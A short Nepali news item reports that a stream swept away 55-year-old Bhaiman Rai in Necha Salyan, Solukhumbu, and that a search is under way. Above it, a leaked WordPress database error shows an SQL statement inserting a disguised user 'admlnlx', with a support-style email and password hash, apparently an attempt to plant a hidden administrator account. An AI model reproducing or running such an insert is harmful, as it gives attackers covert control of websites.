WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B0pzP1MJ/dRPLyDkf56bWYus4patfC0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-23 03:43:19', '', 'admlnlx', 'admlnlx')
सोलुखुम्बु । नेचासल्यान गाउँपालिकाको खहरेखोलाले एक जना पुरुषलाई बगाएको छ ।
नेचासल्यान गाउँपालिका ४ फुर्केका ५५ वर्षिय भैमान राईलाई खहरेखोलाले बगाएको हो ।
राईलाई आईतबार बिहान साथीसँग सल्लयान, ख्याम्पु बाट घर फर्किने क्रममा खहरेखोलाले बगाएको हो । अहिले स्थानीय र प्रहरीको सक्रियतामा खोजि कार्य भईरहेको छ ।